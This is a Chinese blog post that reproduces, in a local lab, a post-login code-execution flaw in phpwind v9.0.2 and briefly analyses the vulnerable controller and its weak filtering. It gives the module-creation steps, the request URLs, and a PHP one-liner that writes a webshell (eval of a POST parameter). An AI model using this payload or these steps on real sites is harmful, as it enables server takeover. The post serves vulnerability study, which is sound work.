漏洞复现:phpwind v 9.0.2后台getshell

最新推荐文章于 2022-11-09 10:57:42 发布
最新推荐文章于 2022-11-09 10:57:42 发布
阅读量3.1k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41631806/article/details/105271085
版权

漏洞复现:phpwind v 9.0.2后台getshell

一、概述
已知影响版本:v9.0.1,v9.0.2
复现版本:9.0.2
搭建环境:phpstudy2018
审计工具:Seay源代码审计系统

二、复现步骤:
1.将源码放置网站根目录(C:\phpStudy\PHPTutorial\WWW)。如下操作,刷新首页,或修改删除目录下.htaccess文件可解决首页访问限制情况:
在这里插入图片描述2.打开install.php页面安装好phpwind后登陆后台。选择门户–>模块管理–>调用管理–>添加模块,新增模块–>选择自定义html–>下一步–>提交代码,模块管理–>调用管理–>调用代码。
在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
3.复制任意站外调用代码url,例json,代码没有过滤:
http://192.168.0.123/phpwind9.0.2/index.php?m=design&c=api&token=qvIQqG3WL2&id=5&format=json
在这里插入图片描述4.去掉url中format参数值,代码被执行:
http://192.168.0.123/phpwind9.0.2/index.php?m=design&c=api&token=qvIQqG3WL2&id=5&format=
在这里插入图片描述
getshell代码:<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST['pp']);?>");?>
菜鸟试着代码审计,原理后续。

三、代码浅析
漏洞代码入口:\src\applications\design\controller\ApiController.php
在这里插入图片描述
run():

getInput('format', 'get');

获取get参数

!$out && $out = 'script';
$method = $out.'Format';
return $this->$method($moduleId);

若format参数为空、0、false(这里false不行,不是bool类型),则执行scriptFormat()

scriptForm():
根据moduleId获取整个module对象——PwDesignModuleDao;
处理我们提交的代码内容(即phpinfo;)的关键代码见
\src\service\design\srv\PwDesignCompile.php
在这里插入图片描述

		$html = preg_replace("/\r\n|\n|\r/", '', $html);
		$html = preg_replace("/οnerrοr=\"(.+)\"/", '', $html);
		$html = "document.write('".$html."');";

只过滤了\n、\r、οnerrοr=""

小菜鸡还有很多代码没看懂,请大神们指教。弄懂补后续。

参考文章:
phpwind v9存在命令执行漏洞(登陆后台)

onlyoneya
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php8.7 入侵管理员密码,phpwind 8.3~8.7 重要安全漏洞补丁发布
weixin_39717367的博客
03-13 811
PHPWind v8.7刚刚发布不久,日前PHPWind官网就发现了PHPWind 8.3~8.7全系高等级安全漏洞,并发布相应的安全补丁,用户可自行修改文件,或者下载补丁文件覆盖网站。补丁名称:phpwind 8.3~8.7bata 安全补丁(更新时间20110826)影响版本:PW8.3 PW8.5 PW8.7bata涉及文件:/lib/utility/querybuilder.class.p...
【3】phpwind v9.0.2 后台getshell
司徒荆的博客
06-05 1312
phpwind v9.0.2 后台getshell,进入后台后才可以
PHPWind v9.0.2 正式版 UTF8 build20170426.zip
07-07
PHPWind社区程序是一套采用php mysql数据库方式运行并可生成html页面的全新且完善的强大系统。PHPWind 9.0 Beta版暂时只支持UTF8编码。我们希望作为一个开源的系统,phpwind可以以其流畅的速度与高负载能力激起各位加入phpwind阵营的热情,并共同打造Nextwind! PHPWind v9.0.2 正式版 UTF8 build20170426更新日志 1、打包了2017年4月1日之前所有安全补丁 2、内置了阿里云滑动插件,免费免注册阿里云账号 PHPWind特点 轻社区/新社区 1、采用新一代的社区交互界面让网民在各个应用模块(论坛、门户、个人空间)之间的切换更加平滑 2、重新整理社区的各种互动功能(板块收藏、喜欢、标签)提升社区的用户黏度 3、全新、多变的产品形态更和更低的运营成本 轻社区/新社区 1、采用新一代的社区交互界面让网民在各个应用模块(论坛、门户、个人空间)之间的切换更加平滑 2、重新整理社区的各种互动功能(板块收藏、喜欢、标签)提升社区的用户黏度 3、全新、多变的产品形态更和更低的运营成本 易开发 1、站长和应用开发者将以更低的成本实现自己的产品意图 2、更多的api接口和预埋hooks让您的奇思妙想能在新一代社区落地 3、灵活多变的模板方案让“个性”如此简单   PHPWind截图   相关阅读 同类推荐:论坛系统
phpwind高危通讯秘钥安全漏洞及修复方案
10-14 464
东方联盟郭盛华/漏洞描述: phpwind9.x 通讯秘钥漏洞可导致前台Getshell。 影响版本: 9.x 漏洞等级: 高危 修复建议: 1、安装官方补丁包:http://www.phpwind.net/read/3709549 2、使用百度云加速WAF防火墙进行防御。 3、添加网站至云观测,及时了解网站组件突发/0day漏洞。 ...
phpwind index.php?m=design&c=api,phpwind 利用哈希长度扩展攻击进行getshell
weixin_30956665的博客
03-13 195
一哥新发的漏洞,还是蛮屌的:今晚基本没睡觉,一直在调试这个漏洞,虽说不知道一哥后续getshell用的是什么方法,但我这个文章基本把该漏洞的原理讲清楚了。至于getshell的话,等漏洞公开了再看看吧。0x01 漏洞点分析phpwind逻辑太冗杂了,一看就是java程序员开发的。补丁文件修补了src/windid/service/base/WindidUtility.php的appKey函数。之前...
PHPWind v9.0.2 正式版 UTF8 build20170426
11-30
PHPWind v9.0.2 正式版 UTF8 build20170426】是一款基于PHP编程语言和MySQL数据库的开源社区软件,它代表了PHPWind团队多年的技术积累与创新。这款社区软件的发布,标志着PHPWind在社区建站领域的又一次重大升级,...
shadowcore:影子世界9.0.2
04-03
"Shadowcore: 影子世界9.0.2" 是一个软件项目或库的更新版本,专注于提供某种特定的功能或服务。"影芯"可能是这个项目的核心组件,它可能是一个关键的中间件或者框架,为其他应用或系统提供底层支持。在IT行业中,...
phpwind_v9.0.2_utf8.zip
05-31
phpwind v9.0.2 UTF8 安装指南】 `phpwind` 是一个流行的开源社区论坛系统,主要用于构建大型、高并发的在线社区。`phpwind v9.0.2` 是该系统的其中一个稳定版本,支持 `UTF8` 编码,能够满足多语言环境的需求。...
PHP又有重大漏洞,PHPWind重大漏洞 大量论坛被夺管理权
weixin_34135138的博客
04-02 467
4月6日傍晚,PHPWind论坛系统漏洞在互联网上爆发,一时间,众多站点开始提供此系统漏洞的恶意攻击工具,大量站点被恶性入侵并删除数据,后台管理员密码无法登陆。大旗、BTCHINA等站点进行关闭修复,而有站点则被删除十万以上数据。今天官方网站论坛又遭到了DDOS攻击。据PHPWind官方表示,PHPWind作为国内被广泛应用的BBS系统程序,在国内互联网中,几乎约占1/3的站点在同时使用该程序,显...
Phpwind出现严重安全漏洞
好好学习,天天向上
01-10 943
近日,国内知名的社区PHPWIND又现严重漏洞,程序中有部分变量没有过滤导致任意包含本地文件,从而可以执行任意PHP命令,官方针对这个漏洞已经做出了修补。 phpwind 7.5 Multiple Include Vulnerabilities author: 80vulteam:http://www.80vul.com一.api/class_base.php本地包含漏洞1.描叙 api/cla
【必备18款】phpwind8.7插件大全论坛必备
08-14
第一步:此包解压覆盖根目录.rar 第二步:参考设置如下: 1、首页N格使用,进入后台--在论坛模式--内容推送--将首页四格关闭; 2、每日发帖奖励guerdon.php文件,后台计划任务调用文件名设置:guerdon.php 3、LED电子广告屏使用,在此包解压覆盖根目录.rar中的ledtu1.html文件修改滚动广告字幕,还需要在后台添加广告代码如下: LED电子屏 4、QQ互联插件参照官方安装: (A、QQ互联插件:PW87QQ互联.rar解压到根目录下 (B、http://您的网站地址/hack/qqconnect/install/安装 (C、后台设置并启用 5、增加了:“214”粉红情侣风格模版,在后台模式: 论坛模式——风格模版——风格列表——开启默认——提交即可 6、所有打包插件说明如下: QQ互联插件:PW87QQ互联.rar ==============以下是hack插件文件夹================ 特殊组VIP卡/积分充值卡:vipcardcenter 修改UID起始号码:un01_modifyuid 关键词自动加链接:keywordlink【需要修改根目录下的read.php目前已经修改好,覆盖即可,修改参考:关键词自动加链接修改方法.txt】 靓号商城:selluid QQ群管理:qqqun 酷狗音乐:kugou 百度新闻:nes 百度帖吧:tieba 56视频上传:open56 宣传中心宣传中心:adv 版主申请:apply 心情签到奖励:xqqiandao 蜘蛛记录:sprecord 【需要修改根目录下的global.php目前已经修改好,覆盖即可】 积分兑奖:credit 个人资料美化:grzl 虚拟在线:xuni 数据采集:xkcj 万年历:wnl 电话114:tel 【参考:电话114插件安装使用方法.txt】 ================================================== 咨询QQ:773433432 欢迎广大朋友站长到社区论坛分享资源和交流:http://www.love9mai.com/phpwind
PHPWIND创始人密码恢复工具
02-27
PHPWIND创始人密码恢复工具
phpwind代码审计
qaq517384的博客
11-09 295
这么久了,连个使用教程和源码解析都难找,寄啦。
php最大的论坛,phpwind论坛史上最大漏洞 -电脑资料
weixin_31131927的博客
03-12 943
发表于家用电脑2007年第19期文/图:飘忽不定就在最近的一个月,国内的一些著名论坛相继被黑,而这些论坛采用的基本都是PHPwind论坛系统,管理员密码,而入侵的过程仅仅只需要十几秒种。截至目前,国内大约有1/3采用PHPwind论坛程序的网站被黑,无数网站被恶意挂马、篡改甚至直接删除数据。而目前,网络上仍然存在不少没有填补该漏洞的网站。本文将为大家揭开此次事件的真相,并给广大站长以及个人建站爱好...
phpwind9.x和8.7XSS注入以及管理后台脚本注入漏洞
10-18 1306
漏洞描述: phpwind近期公布了2处安全漏洞,分别是富文本编辑器发帖的xss注入(受影响版本8.7、9.X)以及管理后台添加新用户时的脚本注入(受影响版本8.7)。 影响版本: phpwind 9.x以及8.7,8.7.1 漏洞等级: 高危 修复建议: 1、安装官方最新补丁,官方补丁:http://www.phpwind.net/read/3709782 2、添加网站至云观测,及时了解网站组...
phpwindexp.php,phpwind 7.5 0day漏洞利用 (EXP发布)
weixin_39912163的博客
03-22 788
phpwind 7.5 Multiple Include Vulnerabilities一.api/class_base.php本地包含漏洞1.描叙api/class_base.php文件里callback函数里$mode变量没有过滤导致任意包含本地文件,从而可以执行任意PHP命令.2. 具体分析api/class_base.php文件里:function callback($mode, $met...
phpwind8.7,懒人回复框代码
浩子小窝
04-08 1785
看效果: 演示地址:http://www.asterisk-help.com/            实现代码:   1: 打开\template\wind\fastpost.htm       找到 添加代码如下:     <!-- 懒人发表 --> >> 支持Asterisk-help社区, 谢绝无意义字符回复 快速回复 楼主辛苦了,谢
php漏洞论坛,PHPWIND1.3.6论坛漏洞分析
weixin_40005373的博客
03-20 498
PHPWIND 论坛是一款流行的PHP 论坛,界面美观,功能也比较强大。但大家仔细看一下会发现不论是从界面功能还是代码风格,它和 DISCUZ 都非常相似,具体原因我想也就不用说了,毕竟 DISCUZ 出来比它要早很多。但安全上它没有继承 DISCUZ 的优点, DISCUZ 论坛安全性非常好,而且商家也对此非常重视安全问题,国内论坛中不论从功能还是安全 , 第一非DISCUZ 莫属。PHPWIN...
Phpwind v9.0 存储型xss跨站漏洞
weixin_30595035的博客
09-26 208
漏洞版本: Phpwind v9.0 漏洞描述: Phpwind专注于中小网站应用的整合和价值的发掘,我们认为,以社区为网站的基础,可以提供丰富的应用,满足人们获取信息、交流、娱乐、消费等生活需求、获得归属感,成为人们的网上家园。 发帖回帖,上传图片处,绕过客户端限制。也可以通过高级,的代码模式进行编辑,插入XSS代码 <* 参考 http://loudong...
securecrt 9.0.2
最新发布
12-14
SecureCRT 9.0.2 是一款功能强大的终端仿真软件,主要用于远程访问和管理网络设备。它支持SSH、Telnet、rlogin、串行以太网协议等多种连接方式,可以帮助网络管理员轻松地远程管理多台设备。 SecureCRT 9.0.2 提供了一系列安全性和便利性的功能,使得远程管理变得更加高效和安全。它具有强大的加密算法,保障用户的数据传输安全;支持多标签窗口和分屏显示,方便用户在多个连接之间快速切换和操作;还提供了脚本化自动化功能,可以通过编写脚本来批量处理任务,提升工作效率。 此外,SecureCRT 9.0.2 还支持灵活的配置管理和会话管理,用户可以保存和管理多个设备的连接信息,方便快捷地进行设备访问和管理。它还提供了强大的会话过滤和搜索功能,用户可以快速定位到需要的设备并进行操作。 总之,SecureCRT 9.0.2 是一款功能全面、安全可靠的终端仿真软件,能够满足网络管理员在远程管理和操作网络设备时的各种需求,是网络管理的得力助手。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值